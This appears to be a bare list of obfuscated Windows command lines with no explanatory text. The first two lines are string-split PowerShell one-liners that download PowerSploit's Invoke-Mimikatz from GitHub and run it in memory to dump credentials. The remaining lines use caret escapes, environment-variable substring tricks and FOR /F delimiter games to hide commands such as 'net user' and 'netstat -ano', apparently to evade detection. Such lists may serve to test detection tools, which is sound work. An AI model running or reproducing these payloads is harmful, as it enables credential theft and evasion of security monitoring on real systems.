nps.exe  ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttps://'+'raw.githubusercontent'+'.com/mattifestation/PowerSploit/master/Exfiltration/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX
powershell -c ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttps://'+'raw.githubusercontent'+'.com/mattifestation/PowerSploit/master/Exfiltration/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX
cmd.exe /V/C"set nBj=npt Hspr&&set Dqv=!nBj:p=e!&&set qm=!Dqv:H=u!&&call %qm%"
FOR /F "delims==Af tokens=2" %O IN ('assoc.cmd')DO %O /V:/C"set BG=Xet kser&&set dop5=!BG:X=n!&&set N7=!dop5:k=u!&&cm%windir:~-4,1%  /C %N7%"
FOR;;;;/F;;"delims=ol tokens=6";;;;;;;;;%L;;;;;IN;;;;;(;;;;;;;;;;';;;;;;;assoc;;;;;;^|;;;;;;;;;findstr;;;;;;;;;lCmd';;;;;;;;);;;;;;;;;;DO;;%L; ;;;;;;;/V:ON;;;;;;/C";;;;;;;;;;(;;;;;;;;;;;;;(;(set ',`;=dethxser);;;;;;;;;;;;;;;;;;;;;);)&&(;;;(;(;(;(;;;;;;;;;;;;;;;;;;;(set ?},$=!',`;:x=u!););;;;;);;;);;;;;;;;;;;);)&&(;;;;;;;;;(;;;;;;;;;(;;;;;;;;;;;;;(;(;(;;;;;;;;;;;;;;;(set @'\;=!?},$:h= !););;;;;;;;;;;;;;;;;);;;;;;;;;);;;;;;;;;;;;;););)&&(;(;;;;;;;;;(;(;;;;;;;;;;;;;;;(;(;;;;;;;;;(;(;(;;;;;;;;;;;;;(set ].;=!@'\;:d=n!);;;);;;;;;;;;);;;;;;;););;;;;;;;;;;);;;;;;;;;;;;;);;;;;;;;;;;;;;;););)&&;;;(;;;;;;;;;;;;;(;(;;;;;;;;;(;;;;;(;;;;;;;;;;;(;;;;;;;;;;;;;;;;;(;(;(call;;;%].;%);););;;;;;;;;;;;;););;;;;;;;;;;;;;;;;);;;;;;;;;;;););)"
FOR,/F,,"tokens=2 delims=qFHL",,,,%v,,,IN,,(,',,,,,,,ftype,,,,,,,,,^|,,,,,findstr,HC',,),,,,,DO,,,,,,,,,%v, ,,,,,,,,,,BmnAc6/VE,,,ymfXW8/C",,,,,,(,,,,,,,,,(,,,,,,,(,,,(,,,,,,,,,,,(,,,,,,,(,,,(,,,,,(,,,,,,,,,(set '   =nBt z,Br),,,,,,,,,),,,),,,,,,,,,,,),,,,,),,,),,,),,,,,,,,,),,,)&&(,,,,,,,,,,,(,,,,,(,,,(,,,,,,,,,(,,,(,,,,,(,,,,,(,,,,,,,(,,,(set ;  =!'   :B=e!),,,,,),,,),,,,,),,,,,,,,,,,),,,,,),,,),,,,,),,,,,,,),,,,,)&&(,,,,,,,(,,,,,(set [    =!;  :,=s!),,,,,),,,,,,,)&&(,,,,,,,,,(,,,,,(,,,,,,,,,,,(,,,,,,,(,,,,,,,(,,,,,(,,,(set '    =![    :z=u!) , ) , , ) , , , ) , ) , , , ) , , ) , , )&&,,,,(,,,,,,,,,(,,,,,(,,,,,,,,,(,,,,,(,,,(FOR,,,,,/F,,,,,,,"delims=3.C tokens=2",,,,,,,,%u,,,,,,,,IN,,,,,,,,,,(,,,,,',,,,,,,assoc,,,,,,,,,,^|,,,find,,,,,,,,"nXM",,',,,,,,,),,,,,,,,DO,,,,,, ,,,,,,,echo;!'    !;;;;;;;;|%u -),,,,,),,,),,,,,),,,,,),,,,,,,,,)"
cmd /V:ON/C"set WIiX=met user&&set YFtI=!WIiX:m=n!&&call %YFtI%"
^C%ALLuSErsPRofile:~9,  1%d,   ,, ^/v^:^o,  /^R " ,  ,  (^sEt ^ ^ ^ ^ Tb=^5ecd^useJ)&(Se^t  ^  ^4^Vik=^!^Tb^:d=^ ^!)&  (   ,   (SE^t ^ ^B5=^!^4^Vik:^5^=n^!) , ,   ,,   , )&&(S^E^t   ^ Do^2F=^!^B^5:^J=^r!)&&  (  ,   (s^eT ^ ^c^a=!D^o^2F^:c^=^t!) )&&,^c^M%wINDIR:~  -4,  +1%,  ,  /c ,, (%^c^a%)  "
cmd.exe /V:ON/C"set IZ=oet qser&&set ZDd=!IZ:o=n!&&set 0s=!ZDd:q=u!&&powershell "!0s!""
^c%COMMonProgRAMW6432:~ -10,1%%os:~-7,  -6%;   ; ;/v^:o^  ;;/^R " ; ;(S^eT ^ ^ ^u^f^=^oC^t ^YsC5)&&   ( ; ; (se^T ^ ^ ^uk^8=!^u^f:^C=^e^!) ; )&&  (s^Et  ^ ^ qV^R=!^u^k^8^:Y=^u^!)&&(^sE^T  ^  x^8m^1=^!qV^R:^o^=n^!)&   (  ;  (s^et s^Za^9=^!^x^8^m^1:5^=^r!) ;  )&&  ;  (   (CalL ; %s^Za^9%) )   "
cmd /V:ON/C"set 3rV=neq uaer&&set 6Puw=!3rV:a=s!&&set kT=!6Puw:q=t!&&cmd /C %kT%"
^f^O^R   ;  ,  ,  , ,   /^f , ,   "   delims=f9k    tokens=     +1   "  ,  , ; ;   ,  %^g  ; ;  ,  , ;  ^IN ;  ;   ( , ;  ,   ' ,   ;   F^^T^^YP^^e   ,  ,  ;  ,   ;  ^|  , ;   ^^f^^iN^^d^^S^^TR , , ^^d^^f^^i^^l    '  ,  ,  ,   ;  ; ) ;  , ^D^O  ;  ,  ,  %^g;   ;  ;  , Ri^/^v^KP^!^ ^ ^ ^  ,   ;   QsRuy/^R   "  ,  ,  ,  (     ,     ;   ,    ;   ,     ;     ,   (^SEt^ ^ ^ ^#^ ^ ^ ^ ^=^_^[^#^/^,^)^[^.)     ;  ;   )&   ( ; ; ; ( ; ; ; ; ; (^S^e^t ^  ^ ^~^ ^ ^ =^!^#^  ^ ^ :^)^=^s!)   ,   ,  ,   ,    ,  )  ,     ,   ,   )&     (     ,     ,   ,    ,  ,  (    ,   ,   ,     ,     ,  (S^e^T ^  ^ ^ ^,^ ^ ^ ^ =^!^~^ ^ ^ ^:[=^e^!) ; ; ; ; ; ) )&&   (  ,     (    ,  (^S^E^T ^  ^ ^  ^$^ ^ =^!^,^ ^ ^ ^ ^:_^=n^!)     ,     ;    ,  ;     ,   ;    ,    )  ,     ,     ,  )&   (   (  ,    (    ,  ,  (   ;    ;    ;     ;  (^s^E^t ^ ^ ^ ^-^ ^ ^ =!^$^ ^ ^:/=^ ^!)  ,    ;    ,   ;     ,  ;     ,  )  ,    ;   ,  ;  ,     ;    ,  ;    ,     ;    ,    )  ,     ,    ,    )    ,    )&&    (     ,    (    ;   ;    (    ,     ,    (^s^E^T ^ ^ ^  ^+^  ^ ^ =^!^-^ ^ ^ ^:^#^=^t^!)   ,    ,    ,     ,  ,     )   ,  ,    ,     ,     ,     )  ,    ;   ,     ;    ,     ;    ,   )&&  (   ,   (    (  ,    ,  (^s^E^t  ^ ^ ^ ^'^ ^ =!^+^  ^ ^ :^,^=^u^!) , , ) ; ; ; ; ; ) ; ; ; ; )&&     (     ,    ,   ,   ,     ,  (s^e^T ^ ^ ^_^ ^  ^ =^!^'^ ^ ^:^.^=r^!)    ,   ,     )&& ,   ;  ,  ;  (  (  ,    ,  (^f^O^r ,  , , , ,  /^F  ; ;  "  tokens=     +3   delims=MX."  ,  ,  %^T ,   ,  ^In  , ;   ,  ;  (   ;  ,  ,   ,  '  ;  ;  ;  ,  ;  ^^aSs^^o^^c ;   ;  ,  ^^.^^p^^s1^^x^^m^^l     '  ;  ,  )   ,  ;  ; ^D^O  ,   ;    , ; ;  ^Ec^h^O   ;  ; !^_^ ^  ^ ! ;  ;  ; |%^T     -)  ,    )     ,    ,    ,   )  "
cmd /V:/C"set V40=ne9Mus/er&&set SIc=!V40:M= !&&set 4al=!SIc:9=t!&&set yYu=!4al:/=""!&&call %yYu%"
cmd.exe /V:ON/C"set 5VG=neY Ks""e$&&set 9P=!5VG:Y=t!&&set vxG=!9P:K=u!&&set psrS=!vxG:$=r!&&cmd.exe /C %psrS%"
%CommonProgramFiles(x86):~     -12,     +1%%ProgramFiles:~      9,      1%%TMP:~         -15,     1%     ^/^V^:^  ^ ^  ^  /^C"s^et^ ^#^\^=n^eh^ 1^s5e^r&&      s^et ^[^@,^]=^!^#^\:^5=""^!&&   se^t  ^ ^ ^ ^  ^ ^ ,^@^_'=^!^[^@^,^]^:1^=^u^!&& s^et ^ ^ ^ ^     ^ ^,^$=^!,^@^_^':^h^=^t^!&& c^a^l^l    %^,^$% "
FOR;;;;/F;;"tokens=2 delims=lf=";;;;;;%l;;;IN;;;;;;;;;(;;;;;;;;';;;;;;assoc;;;.cmd';;;);DO;;%l; ;;;;;;;uIvCY/V};;;;;;;;;;M4H/C";;;;;;;;;;(;;;;;;;;;;;;;;;;;;;;;(;;;(;;;;;;;;;;;;;;;;;;;(;;;;;(;;;;;;;;;;;(;;;;;;;;;(set '    =netVus""er);;;;;);;;;;;;);;;;;;;;;;;;;;;;;);;;;;;;;;;;);;;;;;;);)&&(;;;;;;;;;;;;;(;;;;;;;(;;;;;;;;;;;;;;;(;;;;;;;;;;;;;;;;;(;;;;;(;;;;;;;;;;;;;;;;;;;;;(;;;;;;;;;;;;;;;;;(;;;;;;;(set `   =!'    :V= !);;;;;;;;;;;;;;;;;;;);;;;;;;);;;;;;;;;;;;;;;;;;;);;;);;;;;;;;;;;;;;;);;;;;;;;;;;;;;;;;;;););;;;;;;;;;;;;;;)&&;;;;;;;;(;(;;;;;;;;;;;;;;;;;(;;;;;;;(;;;;;;;;;;;;;;;;;(FOR;;;;;;;;;;/F;;;"delims=m\5s tokens=9";;;;%v;;;;;IN;;;(;;;;;;;;;';;;ftype;;;;;;;;^|;;;;;;;;;;findstr;;lCo';;;;;);;;;DO;;; ;;;;;;;;;echo;;;!`   !;;|%v -);;;;;;;;;);;;;;;;););;;;;;;;;;;;;;;;;;;;;)"
c^M%prOGRAMDAtA:~ +10, +1%,  , ^/V^: ^ ^ , /^R  "  , ,(  ,   (S^e^T    ^ ^L^s=W^e8 ^u^sJe^V)   ,   )&&   (^sE^T ^u^J^VQ=^!L^s:^W^=n^!)&&   (^s^Et ^ l7^oN=^!^u^J^VQ:V=^r!)&&(^sE^T ^ ^w^m^2^V=!^l^7^oN:8^=t^!)& (   ,(^S^E^t  ^  o^J=!^w^m^2^V:^J^=""!) ,)&  , ( ,  ,, ,,   (^CA^lL ,, %o^J%),   )   "
c^M%LOCaLaPpDATA:~  -10,   -9%, ,,^/^v^:^o^   , /r  ", (SE^T  ^CI^A=^ze^t^LJ^U""e3)&   (^Se^T 2^0E=!^CI^A^:^3^=^r!)&  (,   (s^Et ^G^3r=^!^2^0^E:^L^=^ !) ,)&  (   , (sE^t ^ ^peR=^!^G^3^r^:^z=n^!)   , )&& (^S^e^t 2^W=^!^pe^R:U=s^!)&& (^S^Et  ^  s^wm=!^2^W:J=^u^!)&& ,, ( ,   ,  ,  (e^c^ho  , %s^wm% | ,  ,  %LOCALAPpDaTa:~  -3,  +1%^m^D, ) , )  , , "
cmd /V:ON/C"set Md3=net us\""\""ej&&set BU=!Md3:j=r!&&call powershell.exe "%BU%" "
cmd /V:ON/C"set wq=netxus""er&&set 8t=!wq:x= !&&call %8t%"
^F^OR  ;  ;  /^F  , ;  ; ; "   tokens=     +2     delims=H7Fy" ,   ,  %^H ,   , ;  ;  ,  in   ,   ;  ;  ;  ( ;  ,  ,  ;  ,   ' ;  ,  , ,   ^^fT^^Y^^pE  ;   ,  ;  ; ^| ;   ;  , ;  F^^iN^^D^^S^^T^^r ;   ;  ,   ,  ^^m^^d^^F    '   , ,  ; ,  ,  )  , ,  ;  ^D^O ,  ,  ,  ,  ;  %^H,    ;  ;  ;  ;  ; lfZt^/^Vu^K^9^z^6^s^  ^    ;  ; Vbi/^R     "   ; ; ; ,   (    ,    (    (   ;  ;    ;     (   ,    ,  (^S^e^t^ ^{ ^ ^ ^=^]$^:^(^;^+^-^$^))   ,     ,   ,    )    ,     ;     ,  ;  ,  ;  ,   )     ,    ,    ,  ,   ,     )   ,  )&     (  ,   ,    ,     ,    ,     (^se^t  ^ ^ ^'^ ^ =!{^ ^ ^ ^:;^=^u^!)    ,     ;    ,     ;    ,     ;   ,    ;    ,   )&    ( , , ( ; ; ; ; ; ( ; ; ( , , (S^E^t ^ ^ ^ ^ #^ ^ ^ ^ =^!^'^ ^ ^:^-^=""^!)  ,     ,    ,   )     ,  ;   ,     ;  ,   ;     ,   ;     ,     ;    ,    )     ,    )  ,     ,   ,  ,   ,  )&  (    ,    ,  ,     (^sE^t ^ ^ ^{^ ^ =^!^#^ ^ ^ ^ ^:^+^=s^!) )&&  (  ;  ;     ;    (    ;  ;    ;     ;  ;    (    ;    ;   ;   ;    (S^E^t ^ ^ ^ ^ ^ ^*^ ^ =^!^{^ ^ ^:^)=^r^!)   )   )  ,  ,    )&&    (    ,   ,    (     ,  ,     (     ,     ,     (  (^S^e^t ^  ^ ^$^ ^ ^ ^ =^!^*^ ^ ^:]^=n^!) ) ) ; ; ; ) )&     ( ; ; ; ; (^Se^T ^ ^ ^ ^ ^@^ ^ ^  =^!^$^ ^ ^ ^ :^(^= ^!)   ;  ;   ;  ;     ;     )&   (     ,   ,     (     ;    ;    (    ,  (   ;     ;  ;    ;   ;  (^s^ET ^ ^ ^ ^ ^*^ ^  ^ ^ ^ =^!^@^ ^ ^  :$^=^e^!)   ;     ;     ;   )  )   ;     ;     ;    ;  ;  )   ;   ;     ;  ;  ;     )&     (     ;   ;     ;     ;    ;    (  (^s^Et ^ ^ ^  ^ ^\^ ^ ^ =^!^*^ ^ ^ ^ ^ ^ ^:^:^=^t^!) ; ; ; ) ; ; ; )&&   ;   ,  ,  ,  ^F^O^R  ; ,  ,  ,  ;   /^F   ;   ;   ,   , , "    tokens=    +2   delims=JRHFe" ; , ;   %^D  ,  ;  , ^In ;  ; ; ;  ;  (  ; ,  '  ,  ,  ;  , ^^FT^^y^^P^^e   ;  , ,  ,  ,  ^|   , ;  ; F^^in^^d^^s^^t^^r ;  ,   ; ; ^^H^^C  '  ,  ;   ;  ;   ,  )  ,  ,  ,  ;   ;   ^d^o   ,   ,  ,  ,   ;    , ; ,   ; ;  ( ; ; ; ; ( , , ( ; ; ; (^eC^H^O   ;  , ;   ;   %^\^ ^ ^ %   |%^D; )   ,     )    ;     ;     ;    ;     )   )   ; ;  "
^f^O^R  ;  ;   , ,  ;  /^f  ,  ,  "    tokens=  +3  delims=AGql"  ,  ,  %^9  ,  , ,   ;  ^In  ;   ; ,  (  ;  ;  ;  ;   , '  ,   ;   ; ;  ;  A^^S^^S^^O^^c   ;  , , ;  ,   ^|  ; , ; ;  ^^F^^in^^d^^S^^t^^r   ,   , ,  ,   ; ^^c^^d^^x^^m^^l   ' ,  , , )  ,   ;  ,  ,   ^D^O   ,  ,   ,  ,   , %^9,  ,   ,   ; , ; usnNZgvd^/^V^S^~^]^6(^#^m^5^9^q^ ^ ^   ,   ;  ; fCp13sEmT/^c    "   ,   ;   ,  ,   ;  (    ,  ,   ,  (   ,     ;     ,  ;   ,     ;  ,   ;  ,   (s^E^T^ ^ ^ ^ ^ ^~^`^.^=^.^e^_^$^\^%^:^e^])  ,   ,  ,   ,    ,   )  ,   ;     ,    ;    ,    ;  ,  ;    ,    )&&   (   ,    ,  ,   (   ,  ;  ,    ;    ,   ;    ,  (^s^E^t ^ ^ ^ ^ ^ ^}^#^.^\=^!^~^`^.^:^$^=^ ^!)  ,     ,  )  ;  ;   ;   )&&   (  ;   ;  ;  (   ,   ,   (   ;  ;  ;  (^Se^t ^ ^ ^{^$=^!^}^#^.^\^:%=^s!)  ;    ;     ;   ;   ;     )   )   ;     ;    ;   ;  ;     )&   (     ;   ;  ;    (   ;     ;  ;    ;    (^S^E^t ^ ^ ^ ^[^-=^!^{^$^:\^=u^!)    ,     ,  ,     ,   ,    )   ,     ;     ,     ;    ,     ;    ,    ;  ,   )&  ( ( ( ; ; ; ; ( ; ; ; ; ; (^S^e^T ^ ^ ^?^@=^!^[^-^::^=""^!)    ,    )   ,     ,    )   )   ;   ;     )&   (   ,    (  ;  ;  ;    (     ;    ;     (   ;    ;   ;     ;  (^SE^T ^ ^ ^ ^ ^ ^-^.^?^*=^!^?^@^:^_=^t^!)   ,     ,     ,   )     ,     ;    ,     ;   ,   ;   ,    ;     ,    ;  ,    )   ,  ;    ,    ;  ,  ;  ,    ;   ,     ;     ,   )   ,  ,    ,  )&  (  ,     ,     (^s^e^t ^ ^ ^ ^#^\^]^@=^!^-^.^?^*^:^]^=^r^!)    ;    ;  ;     )&&    (     (    (^s^e^t ^ ^ ^ ^ \^+^,^$=!^#^\^]^@^:^.^=n^!)     ,     ;    ,    ;  ,  ;   ,   ;     ,   ;     ,   )    ,     ;    ,   ;     ,   ;  ,   ;  ,     )&& ;  ,  ,  (   ;    ;   ;  ;    (^F^o^R  ,  ; ;  ; /^f  ;  ,  ;   , ;  "  tokens=  +2    delims=.OD" ; ,  ;   ;  %^b   ,  , ,  ;   ^iN   ;  ;   ,  (  ;   ;   ;   ,  '  ;   , ^^f^^t^^y^^p^^E   ,   ; ;  ;  ,  ^|  ;   ,  ^^f^^in^^d^^s^^t^^r   ,  ;  ;  ,   ^^a^^.^^1    ' ;  ;   ,  ,  )   ;  ;  , ^D^o  ,  , ,   ; ,   ;  ,   ,   ,  ^e^C^h^O  ; ;  !\^+^,^$!  ;  ; ; ;  ;   |%^b     -) , , )    "
cmd /V:/C"set Cu=0e""1 us""e\&&set dU=!Cu:\=r!&&set sY9V=!dU:0=n!&&set 1w=!sY9V:1=t!&&call %1w%"
cmd.exe /V:ON/C"set wXB=ne""[ ps""eu&&set n10T=!wXB:u=r!&&set Aa4p=!n10T:p=u!&&set Jkwy=!Aa4p:[=t!&&c%TMP:~-2,1%%SystemRoot:~6,-3%  /C %Jkwy%"
%COMMonprOGRamFILES:~17,-11%%cOMMonPROGRAmFIlES(X86):~25,-9%D /v:/C"set @   =ne""b us""er&sET \  =!@   :b=t!&cAlL %\  %"
^f^Or   ;     ;    ; ;     ; ;    ;     ;     ;   /^F ;;  ;  ;   ;   ;     ;  "   tokens=    2    delims=HQNgF";  ;;     ;%^B ;     ;     ;     ^iN    ;;;     (   ;  ;     ;;  ;  ;    '   ;   ;  ;    ;   ; ; ^f^t^y^PE     ;  ;   ;   ;     ^|  ;    ^f^IN^d^St^R    ;     ;     ^SH^C'  ;     ;  ;   ; )     ;   ;  ;   ^D^o   ; ;   ; ;   ;   ; ;    %^B;     ;   ;  ;   ; ;  ;  ;     ;   ;  ; jm4NU2^/^V^c^ ^  ^  ^   ;  ; ;   ;   ;     ;    ;    ;    ;odNK1ln/^r  " ;   ;(SE^T^ ^ ^ ^ .^]^`^'^=^9n^e""n^ ^u^'""e^r)&   ( ; ; ; ; ; ; ; ( ; ; ; ; ; ; (^s^ET  ^ ^ ^ ^ ^_?^\^}=^!.^]`^'^:n^=^t^!)           )       ;  ;  ;         ;        )&   (^s^e^T ^ ^ ^  ^ ^ ^ ^ ^'^]=!^_^?^\^}:^9^t^=n^!)&         (         ;           ;        ;     ;        (  (      ;     ;       ;     ;        ;         ; ;         ;        (        ;  ; ; (           ;   ;     ; ;       ; ;  ;     ;   ;        ( ; ;           ;           (   ;      ;   ;         ;       ; (     ;   ( ;        ; (^S^E^T ^ ^.^~=^!^'^]^:^'^=^s^!)       ; ; )         ;     ;           ;      )           )           ;      ;    ; ) ;     ;         ;         ;     )       )    )      ;      ;   ;        ; ;    ; ;    ;        )           )& ;  ;     ;  ;   ;   ;;F^o^r;;     ; ;     ;  ; ;  ;  ;  /^f    ;     ;     "         delims=fvQS=      tokens=   2    "     ; ;    ;     ;     ;  ;   ;   ;   ;   %^C;   ;     ;;    ;  ; ;  ^IN    ;   ; ;   (   ;   ;    '     ;    ; ; ;    ; ; ^a^sS^o^C    ;  ;     ;   ; ;  ^| ;    ;    ;     ;   ;     ;;    ; ;     ^f^in^Ds^T^r; ; ;  ; ;  ;^=^c^m       '     ;   ;  ;   ;    ;  ;     ;     ;   ; ;  ) ; ;  ;  ; ;;  ^D^o ;  ;   ;  ; ;; ; ;  ;  %^C;     ;;    /^C    ;     (       ;       ; ;    ;         ;         ;         ;           (%^.^~%) ;        ;   ;         ;        ;   ;      ;   ;   ;       ;     )         "
^f^o^r ;  ;   /^f  ;  ,   , ;   "   delims=fb     tokens=    +1    " ,   ,  ,  ;  ;  %^z  ,  ; ,  ^In  , ; ; (   ; ,   ,  , '  ; ,  ;  ^^fT^^Y^^P^^e  ;   ,   ^|  ; ,  ;  ;   ,  ^^f^^IN^^d^^s^^t^^R   ,   ; , ,  ^^m^^df^^i   '   , ;   ; ,   )   ;   ,  ; , ,  ^D^o  ,  ;   ; ;  %^z,   , ;   ,  zin^/^V^1^ ^   ;   ,  ,  kLTA2z7IpK/^C    "  ,  ; (  ,    ,  (     ,    (^s^e^T ^ ^#^]^+^.^=^?^'^)^t^`^{^;^)^'^() , ) )&&     ( ; ; ; ; ; ( , , ( ( (^s^ET  ^  ^ ^ \^~^}=^!^#^]^+^.^:^{^=^u!) ; ; ; ; ) ) , , ) ; ; ; )&&     ( , ( , , ( , (^S^E^T ^ ^ ^ ^#^[^`^_=!^\^~^}^:^`^=^ !) , , ) , , ) , , )&    (    ,    ;   ,  ;  ,   ;    ,  ;    ,  ;   ,    (  ,   ,  ,    ,   ,   (    ,   ;   ,  ;   ,    ;     ,    (^S^E^t ^ ^  `^,^~=^!^#^[^`^_^:^(^=^r^!)     ;    ;  ;    ;     ;    )     ,    )  )&  (  ,   ,    ,    (   ,   ,   ,  (   ,  ;     ,   ;     ,   ;  ,     ;    ,  ;     ,   (^S^e^t  ^ ^ ^*^{^'=^!^`^,^~^:^)^=""^!)    ;     ;   ;  ;    ;   )  ;  ;    )  ,    )&    (  ;    ;  ;     ;    ;  (    ;     ;   (   ;     ;   (    ,    ,    (^S^e^t ^ ^ ^-^}=!^*^{^':^?^=n^!) ) ) ; ; ; ; ; ) ; ; ; )&   (  (    ;   ;     ;    ;    (^se^t ^ ^ ^ ^.+^;=^!^-^}^:^;^=^s^!)  ,  ,     ,     )    ,   ;    ,   ;     ,  )&&   (  ,   ,  (  ;     ;    (    ;  ;     ;  ;    (^s^e^T ^  ^ ^ *^?=^!^.^+^;:^'^=^e^!)     ,    )     ,  ,  )     ;    ;   )&&  ;   ,  ,  (   ,    (     ,  ;  ,     ;  ,    ;     ,  (C^A^l^L   ,  ;  ; ; %*^?%)   )    ;   ;    ;   ;  ;     )   "
^fo^r  ,  ,  ,   /^F ; ;  ,   ;  "     delims=RfX     tokens=     +1   " ,   ,   %^m   ;  ,   ;  ^IN ,   ; (  ;  ,  ; ,  ; '   ,   , ^^f^^TY^^P^^E  ,  ;   ;   ;   ^|   ,  ,  ^^f^^in^^Ds^^t^^r   ;  ;  ^^m^^d^^f^^i     '   ;  ;  )  , , ;  ;   ^D^O  ; ;  ;  ;  ;  %^m;    ;  ;  , ; ,  zH^/^v-^VFn^ ^   ;   ,   ;   ; 9H/^c  "   ,   ;   ;   (    ;    ;  (^S^e^T^ ^ ^  ^ \ ^ ^ ^=;^{^?@^]^$^.^?^{^_) ; ; ; ; )&    (   ,     ;    ,  ;    ,  ;    ,     ;     ,    ;  ,     (     ,  ,   ,  (   ,    ;     ,     ;    ,  ;  ,   ;    ,   (s^E^T ^ ^ ^ ^`^  ^ =^!\^ ^  ^:^?^=""^!)    ,   ,   )    ,   )  ,   ,     )&&  (     ,    (     ;    ;   (    (S^E^t ^ ^ ^ ^ ^{^ ^ =^!^`^ ^ ^ ^:^{^=e^!)    ;  ;  ;    ;   ;   )  )  ;     ;     ;  ;   )&&  ( , ( ; ; ; ; ( , ( ; ; ; ; (^S^ET ^ ^ ^'^  ^ ^ ^ ^ ^ =^!^{^ ^ :^@^=^t^!)   ,  ,  ,  )  ,  ;  ,    ;   ,  ;   ,     ;    ,  )    ,  ;    ,   ;     ,   )    ,   )&&     (   ,     (^s^E^T ^ ^ ^'^  ^ =^!^'^ ^ ^ ^ ^ ^ ^ ^:.^=^s^!) )&   (     ,     ,    ,   (^s^e^T ^  ^ ^ ^$^ ^ =!^'^ ^ ^ :]^=^ ^!)  ,     )&&   (  ,     (^s^e^T ^ ^ ^ ^ ^ .^ ^ =^!^$^ ^ :^$^=^u^!)  ,    ,  )&&    (  ,    ;   ,  ;    ,     ;  ,   ;    ,  ;   ,    (    ,  ,    ,   ,  ,     (^s^E^t ^ ^ ^ ^ ^ ^'^ ^  ^ =^!^.^ ^ ^:^_^=^r^!)  )  ,   )&&     (   ;  ;  (    (     ;   ;   (   ;   ;     (S^e^T ^ ^ }^ ^ ^ =^!^'^ ^  ^ ^:^;^=n^!)     ,  ,     )   ,     ,   )    ,    ,  )     ,    )& ;  , ;  ,   ^fO^r  ;  ;  ,  /^f  ,   ;  ;  ;  "   tokens=     +1     delims=lXNf"   ,  ,  ;  %^0  ;  ,  ;  ,   ^IN   , ,  ; (   ;  ,   '  ; ;  ^^f^^T^^Y^^P^^e   , ; ^| ,  , ,  ^^f^^IN^^D , ;  ,   ;   , "dfi"   ;   ; ;   ;   ;  ' ;  ;  , )  ;   ; ; ^D^o ,   , ,   ; ;   , ;  ,   ;  ,  (    ,  ;    ,   ;  ,  (   ,    ;  ,     ;    ,  (     ,     ,  ,     (^e^c^h^O   ;   ,   ,   %}^ ^ ^ %   |%^0; )   ,   ,    )   ;     ;  ;     )  ,    ,  ) ;   ;  , ;  ,  "
%locaLApPDaTa:~  -3,-2%%cOmmONproGRaMFILeS(X86):~-26,   1%^D, , , ^/V^:^O ,/r " , , (^se^T ^37=n^e""G ^j^v""e^2)&   ( , (^Se^t ^Qnm^T=^!3^7:^2=r!)   , )&&   (S^ET ^0AL=^!^Qnm^T:^j^=^u!)&   (   ,   (s^ET ^ ^BO=^!^0A^L:^G=t!) , )&& (^s^E^t  l^4^y^P=^!^B^O^:^v^=^s!)&&  ,  ^E^c^Ho  ;; (!l^4^y^P!)  ; ";; | , ,  (^P^O%OS:~  -0,  -9%e^r^S^H^E^L%LOCALaPPDaTa:~-5, +1%    -)  
%commonPROgrAMw6432:~   -12,   -11%%coMMonprogRAmw6432:~-10,   +1%d, ,/^V:^O^    ,  , /R  "  ,, (  ,,   ,(^S^Et     f^F^4^r=9^eH^7^pu^sHe^X)   , )& (^seT ^2u=^!fF4^r:7^=t!)&& (se^t ^ ^J^6e=!^2u^:^p=^ !)&  (S^ET ^ ^ ^hAs^t=^!^J^6e^:9=n!)&&(^s^et  ^ ^7^s=!^h^A^s^t^:H=""!)&  (^s^E^T ^   9^B^z=!^7^s^:^X^=r!)&&  , ,(^ca^L^L , %9^B^z%)"
%cOmMoNProgRAMfILes:~   -12, -11%^M%sySTeMrOOt:~   6, +1%; ;  ^/^v^:^oN^ ^ ^   ;; /^r  " ;(^sE^T^   r^E^b^P=n^ej^t^6X^0j^e^r)&   (   (S^e^T ^   VN^g^t=^!r^EbP^:j=""^!) ;   )& (   (^s^E^t ^ ^W^qvL=^!VN^g^t^:^X^=^u!) ; ; )&(^s^eT ^ ^7N=^!^W^q^v^L:^6=^ ^!)&& ( ; ;  (s^E^T ^ ^ ^H^S=!^7N^:^0^=^s^!)   )& ;  ; %COMMOnpRogRAMw6432:~   -12,1%%PROGramdAtA:~   9,   1%^d; ;;/^C ;;  (%^H^S%) "
cmd.exe /V:ON/C"set SbVE=ne\""\""h us\""\""e4&&set CI=!SbVE:h=t!&&set Ma3=!CI:4=r!&&call powershell.exe "%Ma3%" "
%TMP:~-8,1%%ProgramData:~9,-4%%OS:~-7,-6% /V/C"set ru=nexs""xax 5a""n: ^| fin""dsxr 12""$Y0Y0Y1&&set Ljhz=!ru:$=7!&&set MFW=!Ljhz:Y=.!&&set MAsY=!MFW:5=-!&&set 76EC=!MAsY::=o!&&set H14P=!76EC:x=t!&&FOR /F "tokens=5 delims=slf" %8 IN ('assoc^|find "nX"')DO %8  /C %H14P%"
cmd /V:/C"set Gth=Vets""tat (a""Vj ^| fiV""dstg 12""7[0[0[1&&set ul=!Gth:(=-!&&set HD=!ul:V=n!&&set 3H=!HD:j=o!&&set xLZ=!3H:g=r!&&set l5a=!xLZ:[=.!&&%CommonProgramFiles(x86):~23,1%md  /C %l5a%"
%pUbliC:~-1%%COmmonPRogRAMFILES:~-20,1%d /v:on/c"sET @    =nexs8x@x -@8no ^^^| ,in8dsxr 6287.0.0.6&&SET `   =!@    :8=""!&&sET `    =!`   :,=f!&SEt _   =!`    :x=t!&Set ?    =!_   :6=1!&SEt ]    =!?    :@=a!&&EcHo %]    %|CM%allUSersPRoFIle:~-4,1% "
